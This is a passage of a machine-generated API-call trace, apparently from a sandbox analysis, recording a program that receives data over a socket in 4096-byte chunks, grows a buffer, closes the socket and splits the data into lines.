buf=0x339eb14, len=4096, flags=0 | out: buf=0x339eb14*) returned 4096 [0116.623] recv (in: s=0x558, buf=0x339eb14, len=4096, flags=0 | out: buf=0x339eb14*) returned 1832 [0116.623] malloc (_Size=0x5f3b9) returned 0x34a0048 [0116.629] free (_Block=0x33fc3a0) [0116.801] recv (in: s=0x558, buf=0x339eb14, len=4096, flags=0 | out: buf=0x339eb14*) returned 4096 [0116.802] recv (in: s=0x558, buf=0x339eb14, len=4096, flags=0 | out: buf=0x339eb14*) returned 4096 [0116.802] recv (in: s=0x558, buf=0x339eb14, len=4096, flags=0 | out: buf=0x339eb14*) returned 4096 [0116.802] recv (in: s=0x558, buf=0x339eb14, len=4096, flags=0 | out: buf=0x339eb14*) returned 4096 [0116.803] recv (in: s=0x558, buf=0x339eb14, len=4096, flags=0 | out: buf=0x339eb14*) returned 4096 [0116.803] recv (in: s=0x558, buf=0x339eb14, len=4096, flags=0 | out: buf=0x339eb14*) returned 4096 [0116.803] recv (in: s=0x558, buf=0x339eb14, len=4096, flags=0 | out: buf=0x339eb14*) returned 4096 [0116.803] recv (in: s=0x558, buf=0x339eb14, len=4096, flags=0 | out: buf=0x339eb14*) returned 4096 [0116.803] recv (in: s=0x558, buf=0x339eb14, len=4096, flags=0 | out: buf=0x339eb14*) returned 4096 [0116.804] recv (in: s=0x558, buf=0x339eb14, len=4096, flags=0 | out: buf=0x339eb14*) returned 4096 [0116.804] recv (in: s=0x558, buf=0x339eb14, len=4096, flags=0 | out: buf=0x339eb14*) returned 4096 [0116.805] recv (in: s=0x558, buf=0x339eb14, len=4096, flags=0 | out: buf=0x339eb14*) returned 4096 [0116.805] recv (in: s=0x558, buf=0x339eb14, len=4096, flags=0 | out: buf=0x339eb14*) returned 4096 [0116.805] recv (in: s=0x558, buf=0x339eb14, len=4096, flags=0 | out: buf=0x339eb14*) returned 4096 [0116.805] recv (in: s=0x558, buf=0x339eb14, len=4096, flags=0 | out: buf=0x339eb14*) returned 4096 [0116.805] recv (in: s=0x558, buf=0x339eb14, len=4096, flags=0 | out: buf=0x339eb14*) returned 4096 [0116.805] recv (in: s=0x558, buf=0x339eb14, len=4096, flags=0 | out: buf=0x339eb14*) returned 4096 [0116.805] recv (in: s=0x558, buf=0x339eb14, len=4096, flags=0 | out: buf=0x339eb14*) returned 4096 [0116.805] recv (in: s=0x558, buf=0x339eb14, len=4096, flags=0 | out: buf=0x339eb14*) returned 4096 [0116.806] recv (in: s=0x558, buf=0x339eb14, len=4096, flags=0 | out: buf=0x339eb14*) returned 4096 [0116.806] recv (in: s=0x558, buf=0x339eb14, len=4096, flags=0 | out: buf=0x339eb14*) returned 4096 [0116.806] recv (in: s=0x558, buf=0x339eb14, len=4096, flags=0 | out: buf=0x339eb14*) returned 4096 [0116.806] recv (in: s=0x558, buf=0x339eb14, len=4096, flags=0 | out: buf=0x339eb14*) returned 4096 [0116.806] recv (in: s=0x558, buf=0x339eb14, len=4096, flags=0 | out: buf=0x339eb14*) returned 4096 [0116.806] recv (in: s=0x558, buf=0x339eb14, len=4096, flags=0 | out: buf=0x339eb14*) returned 4096 [0116.807] recv (in: s=0x558, buf=0x339eb14, len=4096, flags=0 | out: buf=0x339eb14*) returned 4096 [0116.807] recv (in: s=0x558, buf=0x339eb14, len=4096, flags=0 | out: buf=0x339eb14*) returned 4096 [0116.807] recv (in: s=0x558, buf=0x339eb14, len=4096, flags=0 | out: buf=0x339eb14*) returned 4096 [0116.807] recv (in: s=0x558, buf=0x339eb14, len=4096, flags=0 | out: buf=0x339eb14*) returned 4096 [0116.807] recv (in: s=0x558, buf=0x339eb14, len=4096, flags=0 | out: buf=0x339eb14*) returned 4096 [0116.807] recv (in: s=0x558, buf=0x339eb14, len=4096, flags=0 | out: buf=0x339eb14*) returned 4096 [0116.808] recv (in: s=0x558, buf=0x339eb14, len=4096, flags=0 | out: buf=0x339eb14*) returned 4096 [0116.808] malloc (_Size=0x8e675) returned 0x36a6020 [0116.814] free (_Block=0x34a0048) [0116.814] recv (in: s=0x558, buf=0x339eb14, len=4096, flags=0 | out: buf=0x339eb14*) returned 4096 [0116.814] recv (in: s=0x558, buf=0x339eb14, len=4096, flags=0 | out: buf=0x339eb14*) returned 4096 [0116.814] recv (in: s=0x558, buf=0x339eb14, len=4096, flags=0 | out: buf=0x339eb14*) returned 4096 [0116.814] recv (in: s=0x558, buf=0x339eb14, len=4096, flags=0 | out: buf=0x339eb14*) returned 4096 [0116.814] recv (in: s=0x558, buf=0x339eb14, len=4096, flags=0 | out: buf=0x339eb14*) returned 4096 [0116.814] recv (in: s=0x558, buf=0x339eb14, len=4096, flags=0 | out: buf=0x339eb14*) returned 4096 [0116.815] recv (in: s=0x558, buf=0x339eb14, len=4096, flags=0 | out: buf=0x339eb14*) returned 4096 [0116.815] recv (in: s=0x558, buf=0x339eb14, len=4096, flags=0 | out: buf=0x339eb14*) returned 4096 [0116.815] recv (in: s=0x558, buf=0x339eb14, len=4096, flags=0 | out: buf=0x339eb14*) returned 4096 [0116.815] recv (in: s=0x558, buf=0x339eb14, len=4096, flags=0 | out: buf=0x339eb14*) returned 4096 [0116.815] recv (in: s=0x558, buf=0x339eb14, len=4096, flags=0 | out: buf=0x339eb14*) returned 4096 [0116.815] recv (in: s=0x558, buf=0x339eb14, len=4096, flags=0 | out: buf=0x339eb14*) returned 4096 [0116.816] recv (in: s=0x558, buf=0x339eb14, len=4096, flags=0 | out: buf=0x339eb14*) returned 4096 [0116.816] recv (in: s=0x558, buf=0x339eb14, len=4096, flags=0 | out: buf=0x339eb14*) returned 4096 [0116.816] recv (in: s=0x558, buf=0x339eb14, len=4096, flags=0 | out: buf=0x339eb14*) returned 4096 [0116.816] recv (in: s=0x558, buf=0x339eb14, len=4096, flags=0 | out: buf=0x339eb14*) returned 4096 [0116.816] recv (in: s=0x558, buf=0x339eb14, len=4096, flags=0 | out: buf=0x339eb14*) returned 4096 [0116.816] recv (in: s=0x558, buf=0x339eb14, len=4096, flags=0 | out: buf=0x339eb14*) returned 4096 [0116.816] recv (in: s=0x558, buf=0x339eb14, len=4096, flags=0 | out: buf=0x339eb14*) returned 4096 [0116.817] recv (in: s=0x558, buf=0x339eb14, len=4096, flags=0 | out: buf=0x339eb14*) returned 4096 [0116.817] recv (in: s=0x558, buf=0x339eb14, len=4096, flags=0 | out: buf=0x339eb14*) returned 4096 [0116.817] recv (in: s=0x558, buf=0x339eb14, len=4096, flags=0 | out: buf=0x339eb14*) returned 4096 [0116.817] recv (in: s=0x558, buf=0x339eb14, len=4096, flags=0 | out: buf=0x339eb14*) returned 4096 [0116.817] recv (in: s=0x558, buf=0x339eb14, len=4096, flags=0 | out: buf=0x339eb14*) returned 4096 [0116.817] recv (in: s=0x558, buf=0x339eb14, len=4096, flags=0 | out: buf=0x339eb14*) returned 4096 [0116.827] recv (in: s=0x558, buf=0x339eb14, len=4096, flags=0 | out: buf=0x339eb14*) returned 4096 [0116.827] recv (in: s=0x558, buf=0x339eb14, len=4096, flags=0 | out: buf=0x339eb14*) returned 4096 [0116.827] recv (in: s=0x558, buf=0x339eb14, len=4096, flags=0 | out: buf=0x339eb14*) returned 4096 [0116.827] recv (in: s=0x558, buf=0x339eb14, len=4096, flags=0 | out: buf=0x339eb14*) returned 4096 [0116.827] recv (in: s=0x558, buf=0x339eb14, len=4096, flags=0 | out: buf=0x339eb14*) returned 4096 [0116.828] recv (in: s=0x558, buf=0x339eb14, len=4096, flags=0 | out: buf=0x339eb14*) returned 4096 [0116.828] recv (in: s=0x558, buf=0x339eb14, len=4096, flags=0 | out: buf=0x339eb14*) returned 4096 [0116.828] recv (in: s=0x558, buf=0x339eb14, len=4096, flags=0 | out: buf=0x339eb14*) returned 4096 [0116.828] recv (in: s=0x558, buf=0x339eb14, len=4096, flags=0 | out: buf=0x339eb14*) returned 4096 [0116.829] recv (in: s=0x558, buf=0x339eb14, len=4096, flags=0 | out: buf=0x339eb14*) returned 4096 [0116.834] recv (in: s=0x558, buf=0x339eb14, len=4096, flags=0 | out: buf=0x339eb14*) returned 4096 [0116.836] recv (in: s=0x558, buf=0x339eb14, len=4096, flags=0 | out: buf=0x339eb14*) returned 4096 [0116.836] recv (in: s=0x558, buf=0x339eb14, len=4096, flags=0 | out: buf=0x339eb14*) returned 4096 [0116.836] recv (in: s=0x558, buf=0x339eb14, len=4096, flags=0 | out: buf=0x339eb14*) returned 4096 [0116.836] recv (in: s=0x558, buf=0x339eb14, len=4096, flags=0 | out: buf=0x339eb14*) returned 4096 [0116.837] recv (in: s=0x558, buf=0x339eb14, len=4096, flags=0 | out: buf=0x339eb14*) returned 4096 [0116.837] recv (in: s=0x558, buf=0x339eb14, len=4096, flags=0 | out: buf=0x339eb14*) returned 4096 [0116.837] recv (in: s=0x558, buf=0x339eb14, len=4096, flags=0 | out: buf=0x339eb14*) returned 4096 [0116.837] recv (in: s=0x558, buf=0x339eb14, len=4096, flags=0 | out: buf=0x339eb14*) returned 4096 [0116.837] recv (in: s=0x558, buf=0x339eb14, len=4096, flags=0 | out: buf=0x339eb14*) returned 4096 [0116.837] recv (in: s=0x558, buf=0x339eb14, len=4096, flags=0 | out: buf=0x339eb14*) returned 4096 [0116.838] recv (in: s=0x558, buf=0x339eb14, len=4096, flags=0 | out: buf=0x339eb14*) returned 4096 [0116.838] malloc (_Size=0xd4e75) returned 0x374b020 [0117.024] free (_Block=0x36a6020) [0117.028] recv (in: s=0x558, buf=0x339eb14, len=4096, flags=0 | out: buf=0x339eb14*) returned 4096 [0117.028] recv (in: s=0x558, buf=0x339eb14, len=4096, flags=0 | out: buf=0x339eb14*) returned 4096 [0117.028] recv (in: s=0x558, buf=0x339eb14, len=4096, flags=0 | out: buf=0x339eb14*) returned 4096 [0117.030] recv (in: s=0x558, buf=0x339eb14, len=4096, flags=0 | out: buf=0x339eb14*) returned 4096 [0117.030] recv (in: s=0x558, buf=0x339eb14, len=4096, flags=0 | out: buf=0x339eb14*) returned 4096 [0117.030] recv (in: s=0x558, buf=0x339eb14, len=4096, flags=0 | out: buf=0x339eb14*) returned 4096 [0117.030] recv (in: s=0x558, buf=0x339eb14, len=4096, flags=0 | out: buf=0x339eb14*) returned 4096 [0117.031] recv (in: s=0x558, buf=0x339eb14, len=4096, flags=0 | out: buf=0x339eb14*) returned 4096 [0117.031] recv (in: s=0x558, buf=0x339eb14, len=4096, flags=0 | out: buf=0x339eb14*) returned 4096 [0117.031] recv (in: s=0x558, buf=0x339eb14, len=4096, flags=0 | out: buf=0x339eb14*) returned 4096 [0117.031] recv (in: s=0x558, buf=0x339eb14, len=4096, flags=0 | out: buf=0x339eb14*) returned 4096 [0117.031] recv (in: s=0x558, buf=0x339eb14, len=4096, flags=0 | out: buf=0x339eb14*) returned 4096 [0117.031] recv (in: s=0x558, buf=0x339eb14, len=4096, flags=0 | out: buf=0x339eb14*) returned 4096 [0117.031] recv (in: s=0x558, buf=0x339eb14, len=4096, flags=0 | out: buf=0x339eb14*) returned 4096 [0117.032] recv (in: s=0x558, buf=0x339eb14, len=4096, flags=0 | out: buf=0x339eb14*) returned 4096 [0117.032] recv (in: s=0x558, buf=0x339eb14, len=4096, flags=0 | out: buf=0x339eb14*) returned 4096 [0117.032] recv (in: s=0x558, buf=0x339eb14, len=4096, flags=0 | out: buf=0x339eb14*) returned 4096 [0117.032] recv (in: s=0x558, buf=0x339eb14, len=4096, flags=0 | out: buf=0x339eb14*) returned 4096 [0117.032] recv (in: s=0x558, buf=0x339eb14, len=4096, flags=0 | out: buf=0x339eb14*) returned 4096 [0117.032] recv (in: s=0x558, buf=0x339eb14, len=4096, flags=0 | out: buf=0x339eb14*) returned 4096 [0117.032] recv (in: s=0x558, buf=0x339eb14, len=4096, flags=0 | out: buf=0x339eb14*) returned 4096 [0117.033] recv (in: s=0x558, buf=0x339eb14, len=4096, flags=0 | out: buf=0x339eb14*) returned 4096 [0117.033] recv (in: s=0x558, buf=0x339eb14, len=4096, flags=0 | out: buf=0x339eb14*) returned 4096 [0117.033] recv (in: s=0x558, buf=0x339eb14, len=4096, flags=0 | out: buf=0x339eb14*) returned 4096 [0117.033] recv (in: s=0x558, buf=0x339eb14, len=4096, flags=0 | out: buf=0x339eb14*) returned 4096 [0117.033] recv (in: s=0x558, buf=0x339eb14, len=4096, flags=0 | out: buf=0x339eb14*) returned 4096 [0117.033] recv (in: s=0x558, buf=0x339eb14, len=4096, flags=0 | out: buf=0x339eb14*) returned 4096 [0117.034] recv (in: s=0x558, buf=0x339eb14, len=4096, flags=0 | out: buf=0x339eb14*) returned 4096 [0117.034] recv (in: s=0x558, buf=0x339eb14, len=4096, flags=0 | out: buf=0x339eb14*) returned 4096 [0117.034] recv (in: s=0x558, buf=0x339eb14, len=4096, flags=0 | out: buf=0x339eb14*) returned 4096 [0117.034] recv (in: s=0x558, buf=0x339eb14, len=4096, flags=0 | out: buf=0x339eb14*) returned 4096 [0117.034] recv (in: s=0x558, buf=0x339eb14, len=4096, flags=0 | out: buf=0x339eb14*) returned 4096 [0117.034] recv (in: s=0x558, buf=0x339eb14, len=4096, flags=0 | out: buf=0x339eb14*) returned 4096 [0117.034] recv (in: s=0x558, buf=0x339eb14, len=4096, flags=0 | out: buf=0x339eb14*) returned 4096 [0117.035] recv (in: s=0x558, buf=0x339eb14, len=4096, flags=0 | out: buf=0x339eb14*) returned 4096 [0117.035] recv (in: s=0x558, buf=0x339eb14, len=4096, flags=0 | out: buf=0x339eb14*) returned 4096 [0117.035] recv (in: s=0x558, buf=0x339eb14, len=4096, flags=0 | out: buf=0x339eb14*) returned 4096 [0117.035] recv (in: s=0x558, buf=0x339eb14, len=4096, flags=0 | out: buf=0x339eb14*) returned 4096 [0117.035] recv (in: s=0x558, buf=0x339eb14, len=4096, flags=0 | out: buf=0x339eb14*) returned 4096 [0117.035] recv (in: s=0x558, buf=0x339eb14, len=4096, flags=0 | out: buf=0x339eb14*) returned 4096 [0117.036] recv (in: s=0x558, buf=0x339eb14, len=4096, flags=0 | out: buf=0x339eb14*) returned 4096 [0117.036] recv (in: s=0x558, buf=0x339eb14, len=4096, flags=0 | out: buf=0x339eb14*) returned 4096 [0117.036] recv (in: s=0x558, buf=0x339eb14, len=4096, flags=0 | out: buf=0x339eb14*) returned 4096 [0117.036] recv (in: s=0x558, buf=0x339eb14, len=4096, flags=0 | out: buf=0x339eb14*) returned 4096 [0117.036] recv (in: s=0x558, buf=0x339eb14, len=4096, flags=0 | out: buf=0x339eb14*) returned 4096 [0117.037] recv (in: s=0x558, buf=0x339eb14, len=4096, flags=0 | out: buf=0x339eb14*) returned 4096 [0117.037] recv (in: s=0x558, buf=0x339eb14, len=4096, flags=0 | out: buf=0x339eb14*) returned 4096 [0117.037] recv (in: s=0x558, buf=0x339eb14, len=4096, flags=0 | out: buf=0x339eb14*) returned 4096 [0117.037] recv (in: s=0x558, buf=0x339eb14, len=4096, flags=0 | out: buf=0x339eb14*) returned 4096 [0117.037] recv (in: s=0x558, buf=0x339eb14, len=4096, flags=0 | out: buf=0x339eb14*) returned 4096 [0117.038] recv (in: s=0x558, buf=0x339eb14, len=4096, flags=0 | out: buf=0x339eb14*) returned 4096 [0117.038] recv (in: s=0x558, buf=0x339eb14, len=4096, flags=0 | out: buf=0x339eb14*) returned 4096 [0117.038] recv (in: s=0x558, buf=0x339eb14, len=4096, flags=0 | out: buf=0x339eb14*) returned 4096 [0117.038] recv (in: s=0x558, buf=0x339eb14, len=4096, flags=0 | out: buf=0x339eb14*) returned 4096 [0117.039] recv (in: s=0x558, buf=0x339eb14, len=4096, flags=0 | out: buf=0x339eb14*) returned 4096 [0117.039] recv (in: s=0x558, buf=0x339eb14, len=4096, flags=0 | out: buf=0x339eb14*) returned 4096 [0117.039] recv (in: s=0x558, buf=0x339eb14, len=4096, flags=0 | out: buf=0x339eb14*) returned 4096 [0117.039] recv (in: s=0x558, buf=0x339eb14, len=4096, flags=0 | out: buf=0x339eb14*) returned 4096 [0117.039] recv (in: s=0x558, buf=0x339eb14, len=4096, flags=0 | out: buf=0x339eb14*) returned 4096 [0117.039] recv (in: s=0x558, buf=0x339eb14, len=4096, flags=0 | out: buf=0x339eb14*) returned 4096 [0117.040] recv (in: s=0x558, buf=0x339eb14, len=4096, flags=0 | out: buf=0x339eb14*) returned 4096 [0117.040] recv (in: s=0x558, buf=0x339eb14, len=4096, flags=0 | out: buf=0x339eb14*) returned 4096 [0117.040] recv (in: s=0x558, buf=0x339eb14, len=4096, flags=0 | out: buf=0x339eb14*) returned 4096 [0117.040] recv (in: s=0x558, buf=0x339eb14, len=4096, flags=0 | out: buf=0x339eb14*) returned 4096 [0117.040] recv (in: s=0x558, buf=0x339eb14, len=4096, flags=0 | out: buf=0x339eb14*) returned 4096 [0117.040] recv (in: s=0x558, buf=0x339eb14, len=4096, flags=0 | out: buf=0x339eb14*) returned 4096 [0117.042] recv (in: s=0x558, buf=0x339eb14, len=4096, flags=0 | out: buf=0x339eb14*) returned 4096 [0117.042] recv (in: s=0x558, buf=0x339eb14, len=4096, flags=0 | out: buf=0x339eb14*) returned 4096 [0117.042] recv (in: s=0x558, buf=0x339eb14, len=4096, flags=0 | out: buf=0x339eb14*) returned 4096 [0117.043] recv (in: s=0x558, buf=0x339eb14, len=4096, flags=0 | out: buf=0x339eb14*) returned 4096 [0117.043] malloc (_Size=0x13de75) returned 0x383a020 [0117.057] free (_Block=0x374b020) [0117.063] recv (in: s=0x558, buf=0x339eb14, len=4096, flags=0 | out: buf=0x339eb14*) returned 4096 [0117.063] recv (in: s=0x558, buf=0x339eb14, len=4096, flags=0 | out: buf=0x339eb14*) returned 4096 [0117.063] recv (in: s=0x558, buf=0x339eb14, len=4096, flags=0 | out: buf=0x339eb14*) returned 4096 [0117.063] recv (in: s=0x558, buf=0x339eb14, len=4096, flags=0 | out: buf=0x339eb14*) returned 4096 [0117.063] recv (in: s=0x558, buf=0x339eb14, len=4096, flags=0 | out: buf=0x339eb14*) returned 4096 [0117.064] recv (in: s=0x558, buf=0x339eb14, len=4096, flags=0 | out: buf=0x339eb14*) returned 4096 [0117.064] recv (in: s=0x558, buf=0x339eb14, len=4096, flags=0 | out: buf=0x339eb14*) returned 4096 [0117.064] recv (in: s=0x558, buf=0x339eb14, len=4096, flags=0 | out: buf=0x339eb14*) returned 4096 [0117.066] recv (in: s=0x558, buf=0x339eb14, len=4096, flags=0 | out: buf=0x339eb14*) returned 4096 [0117.067] recv (in: s=0x558, buf=0x339eb14, len=4096, flags=0 | out: buf=0x339eb14*) returned 4096 [0117.067] recv (in: s=0x558, buf=0x339eb14, len=4096, flags=0 | out: buf=0x339eb14*) returned 4096 [0117.067] recv (in: s=0x558, buf=0x339eb14, len=4096, flags=0 | out: buf=0x339eb14*) returned 4096 [0117.067] recv (in: s=0x558, buf=0x339eb14, len=4096, flags=0 | out: buf=0x339eb14*) returned 4096 [0117.067] recv (in: s=0x558, buf=0x339eb14, len=4096, flags=0 | out: buf=0x339eb14*) returned 4096 [0117.068] recv (in: s=0x558, buf=0x339eb14, len=4096, flags=0 | out: buf=0x339eb14*) returned 4096 [0117.068] recv (in: s=0x558, buf=0x339eb14, len=4096, flags=0 | out: buf=0x339eb14*) returned 4096 [0117.068] recv (in: s=0x558, buf=0x339eb14, len=4096, flags=0 | out: buf=0x339eb14*) returned 4096 [0117.068] recv (in: s=0x558, buf=0x339eb14, len=4096, flags=0 | out: buf=0x339eb14*) returned 4096 [0117.068] recv (in: s=0x558, buf=0x339eb14, len=4096, flags=0 | out: buf=0x339eb14*) returned 4096 [0117.069] recv (in: s=0x558, buf=0x339eb14, len=4096, flags=0 | out: buf=0x339eb14*) returned 4096 [0117.069] recv (in: s=0x558, buf=0x339eb14, len=4096, flags=0 | out: buf=0x339eb14*) returned 4096 [0117.187] recv (in: s=0x558, buf=0x339eb14, len=4096, flags=0 | out: buf=0x339eb14*) returned 4096 [0117.187] recv (in: s=0x558, buf=0x339eb14, len=4096, flags=0 | out: buf=0x339eb14*) returned 4096 [0117.188] recv (in: s=0x558, buf=0x339eb14, len=4096, flags=0 | out: buf=0x339eb14*) returned 4096 [0117.188] recv (in: s=0x558, buf=0x339eb14, len=4096, flags=0 | out: buf=0x339eb14*) returned 4096 [0117.188] recv (in: s=0x558, buf=0x339eb14, len=4096, flags=0 | out: buf=0x339eb14*) returned 4096 [0117.188] recv (in: s=0x558, buf=0x339eb14, len=4096, flags=0 | out: buf=0x339eb14*) returned 4096 [0117.188] recv (in: s=0x558, buf=0x339eb14, len=4096, flags=0 | out: buf=0x339eb14*) returned 4096 [0117.188] recv (in: s=0x558, buf=0x339eb14, len=4096, flags=0 | out: buf=0x339eb14*) returned 4096 [0117.189] recv (in: s=0x558, buf=0x339eb14, len=4096, flags=0 | out: buf=0x339eb14*) returned 4096 [0117.189] recv (in: s=0x558, buf=0x339eb14, len=4096, flags=0 | out: buf=0x339eb14*) returned 4096 [0117.189] recv (in: s=0x558, buf=0x339eb14, len=4096, flags=0 | out: buf=0x339eb14*) returned 4096 [0117.189] recv (in: s=0x558, buf=0x339eb14, len=4096, flags=0 | out: buf=0x339eb14*) returned 4096 [0117.189] recv (in: s=0x558, buf=0x339eb14, len=4096, flags=0 | out: buf=0x339eb14*) returned 4096 [0117.189] recv (in: s=0x558, buf=0x339eb14, len=4096, flags=0 | out: buf=0x339eb14*) returned 4096 [0117.245] malloc (_Size=0x1db675) returned 0x398a020 [0117.373] free (_Block=0x383a020) [0117.723] malloc (_Size=0x2c8675) returned 0x36ac020 [0117.950] free (_Block=0x398a020) [0118.065] malloc (_Size=0x2796f6) returned 0x3982020 [0118.073] free (_Block=0x0) [0118.167] free (_Block=0x36ac020) [0118.244] free (_Block=0x6066d8) [0118.244] closesocket (s=0xffffffff) returned -1 [0118.244] free (_Block=0x0) [0118.244] free (_Block=0x605aa0) [0118.244] free (_Block=0x0) [0118.244] free (_Block=0x0) [0118.244] malloc (_Size=0x2796f6) returned 0x36a4020 [0118.252] free (_Block=0x0) [0118.288] malloc (_Size=0x19) returned 0x605aa0 [0118.288] free (_Block=0x0) [0118.288] malloc (_Size=0x40) returned 0x6066d8 [0118.288] free (_Block=0x0) [0118.288] free (_Block=0x0) [0118.288] memchr (_Buf=0x36a4039, _Val=10, _MaxCount=0x2796dc) returned 0x36a404e [0118.288] malloc (_Size=0x16) returned 0x605ac8 [0118.288] free (_Block=0x0) [0118.288] free (_Block=0x0) [0118.288] memchr (_Buf=0x36a404f, _Val=10, _MaxCount=0x2796c6) returned 0x36a4062 [0118.288] malloc (_Size=0x14) returned 0x606720 [0118.289] free (_Block=0x0) [0118.289] free (_Block=0x0) [0118.289] memchr (_Buf=0x36a4063, _Val=10, _MaxCount=0x2796b2) returned 0x36a4082 [0118.289] malloc (_Size=0x20) returned 0x606740 [0118.289] free (_Block=0x0) [0118.289] free (_Block=0x0) [0118.289] memchr (_Buf=0x36a4083, _Val=10, _MaxCount=0x279692) returned 0x36a40a2 [0118.289] malloc (_Size=0x20) returned 0x606768 [0118.289] free (_Block=0x0) [0118.289] malloc (_Size=0x140) returned 0x33a0048 [0118.289] free (_Block=0x6066d8) [0118.289] free (_Block=0x0) [0118.289] memchr (_Buf=0x36a40a3, _Val=10, _MaxCount=0x279672) returned 0x36a40c2 [0118.289] malloc (_Size=0x20) returned 0x6066d8 [0118.289] free (_Block=0x0) [0118.289] free (_Block=0x0) [0118.289] memchr (_Buf=0x36a40c3, _Val=10, _MaxCount=0x279652) returned 0x36a40d7 [0118.289] malloc (_Size=0x15) returned 0x606700 [0118.289] free (_Block=0x0) [0118.289] free (_Block=0x0) [0118.361] memchr (_Buf=0x36a40d8, _Val=10, _MaxCount=0x27963d) returned 0x36a416f [0118.361] malloc (_Size=0x98) returned 0x606790 [0118.362] free (_Block=0x0) [0118.362] free (_Block=0x0) [0118.362] memchr (_Buf=0x36a4170, _Val=10, _MaxCount=0x2795a5) returned 0x36a4207 [0118.363] malloc (_Size=0x98) returned 0x33a0190 [0118.363] free (_Block=0x0) [0118.363] free (_Block=0x0) [0118.363] memchr (_Buf=0x36a4208, _Val=10, _MaxCount=0x27950d) returned 0x36a426e [0118.363] malloc (_Size=0x67) returned 0x33a0230 [0118.363] free (_Block=0x0) [0118.363] free (_Block=0x0) [0118.363] memchr (_Buf=0x36a426f, _Val=10, _MaxCount=0x2794a6) returned 0x36a42eb [0118.363] malloc (_Size=0x7d) returned 0x609c70 [0118.363] free (_Block=0x0) [0118.363] free (_Block=0x0) [0118.363] memchr (_Buf=0x36a42ec, _Val=10, _MaxCount=0x279429) returned 0x36a4367 [0118.363] malloc (_Size=0x7c) returned 0x60a358 [0118.363] free (_Block=0x0) [0118.363] free (_Block=0x0) [0118.363] memchr (_Buf=0x36a4368, _Val=10, _MaxCount=0x2793ad) returned 0x36a43d6 [0118.363] malloc (_Size=0x6f) returned 0x33a02a0 [0118.364] free (_Block=0x0) [0118.364] free (_Block=0x0) [0118.364] memchr (_Buf=0x36a43d7, _Val=10, _MaxCount=0x27933e) returned 0x36a4442 [0118.364] malloc (_Size=0x6c) returned 0x33a0318 [0118.364] free (_Block=0x0) [0118.364] free (_Block=0x0) [0118.364] memchr (_Buf=0x36a4443, _Val=10, _MaxCount=0x2792d2) returned 0x36a45e6 [0118.364] malloc (_Size=0x1a4) returned 0x33a0390 [0118.364] free (_Block=0x0) [0118.364] free (_Block=0x0) [0118.364] memchr (_Buf=0x36a45e7, _Val=10, _MaxCount=0x27912e) returned 0x36a4630 [0118.364] malloc (_Size=0x4a) returned 0x33a0540 [0118.364] free (_Block=0x0) [0118.364] free (_Block=0x0) [0118.364] memchr (_Buf=0x36a4631, _Val=10, _MaxCount=0x2790e4) returned 0x36a4679 [0118.364] malloc (_Size=0x49) returned 0x33a0598 [0118.364] free (_Block=0x0) [0118.364] free (_Block=0x0) [0118.364] memchr (_Buf=0x36a467a, _Val=10, _MaxCount=0x27909b) returned 0x36a46e4 [0118.364] malloc (_Size=0x6b) returned 0x33a05f0 [0118.364] free (_Block=0x0) [0118.364] free (_Block=0x0) [0118.364] memchr (_Buf=0x36a46e5, _Val=10, _MaxCount=0x279030) returned 0x36a46fb [0118.364] malloc (_Size=0x17) returned 0x606830 [0118.365] free (_Block=0x0) [0118.365] free (_Block=0x0) [0118.365] memchr (_Buf=0x36a46fc, _Val=10, _MaxCount=0x279019) returned 0x36a4730 [0118.365] malloc (_Size=0x35) returned 0x33a0668 [0118.365] free (_Block=0x0) [0118.365] free (_Block=0x0) [0118.365] memchr (_Buf=0x36a4731, _Val=10, _MaxCount=0x278fe4) returned 0x36a4789 [0118.365] malloc (_Size=0x59) returned 0x33a06a8 [0118.365] free (_Block=0x0) [0118.365] malloc (_Size=0x540) returned 0x33a0710 [0118.365] free (_Block=0x33a0048) [0118.365] free (_Block=0x0) [0118.365] memchr (_Buf=0x36a478a, _Val=10, _MaxCount=0x278f8b) returned 0x36a47a1 [0118.365] malloc (_Size=0x18) returned 0x33a0048 [0118.365] free (_Block=0x0) [0118.365] free (_Block=0x0) [0118.365] memchr (_Buf=0x36a47a2, _Val=10, _MaxCount=0x278f73) returned 0x36a47d6 [0118.365] malloc (_Size=0x35) returned 0x33a0068 [0118.365] free (_Block=0x0) [0118.365] free (_Block=0x0) [0118.365] memchr (_Buf=0x36a47d7, _Val=10, _MaxCount=0x278f3e) returned 0x36a4836 [0118.365] malloc (_Size=0x60) returned 0x33a00a8 [0118.365] free (_Block=0x0) [0118.366] free (_Block=0x0) [0118.366] memchr (_Buf=0x36a4837, _Val=10, _MaxCount=0x278ede) returned 0x36a4891 [0118.366] malloc (_Size=0x5b) returned 0x33a0110 [0118.366] free (_Block=0x0) [0118.366] free (_Block=0x0) [0118.366] memchr (_Buf=0x36a4892, _Val=10, _MaxCount=0x278e83) returned 0x36a48c6 [0118.366] malloc (_Size=0x35) returned 0x33a0c58 [0118.366] free (_Block=0x0) [0118.366] free (_Block=0x0) [0118.366] memchr (_Buf=0x36a48c7, _Val=10, _MaxCount=0x278e4e) returned 0x36a4926 [0118.366] malloc (_Size=0x60) returned 0x33a0c98 [0118.366] free (_Block=0x0) [0118.366] free (_Block=0x0) [0118.366] memchr (_Buf=0x36a4927, _Val=10, _MaxCount=0x278dee) returned 0x36a4971 [0118.366] malloc (_Size=0x4b) returned 0x33a0d00 [0118.366] free (_Block=0x0) [0118.366] free (_Block=0x0) [0118.366] memchr (_Buf=0x36a4972, _Val=10, _MaxCount=0x278da3) returned 0x36a49a6 [0118.366] malloc (_Size=0x35) returned 0x33a0d58 [0118.366] free (_Block=0x0) [0118.366] free (_Block=0x0) [0118.366] memchr (_Buf=0x36a49a7, _Val=10, _MaxCount=0x278d6e) returned 0x36a4a04 [0118.366] malloc (_Size=0x5e) returned 0x33a0d98 [0118.367] free (_Block=0x0) [0118.367] free (_Block=0x0) [0118.367] memchr (_Buf=0x36a4a05, _Val=10, _MaxCount=0x278d10) returned 0x36a4a46 [0118.367] malloc (_Size=0x42) returned 0x33a0e00 [0118.367] free (_Block=0x0) [0118.367] free (_Block=0x0) [0118.367] memchr (_Buf=0x36a4a47, _Val=10, _MaxCount=0x278cce) returned 0x36a4a7b [0118.367] malloc (_Size=0x35) returned 0x33a0e50 [0118.367] free (_Block=0x0) [0118.367] free (_Block=0x0) [0118.367] memchr (_Buf=0x36a4a7c, _Val=10, _MaxCount=0x278c99) returned 0x36a4ad8 [0118.367] malloc (_Size=0x5d) returned 0x33a0e90 [0118.367] free (_Block=0x0) [0118.367] free (_Block=0x0) [0118.367] memchr (_Buf=0x36a4ad9, _Val=10, _MaxCount=0x278c3c) returned 0x36a4b04 [0118.367] malloc (_Size=0x2c) returned 0x33a0ef8 [0118.367] free (_Block=0x0) 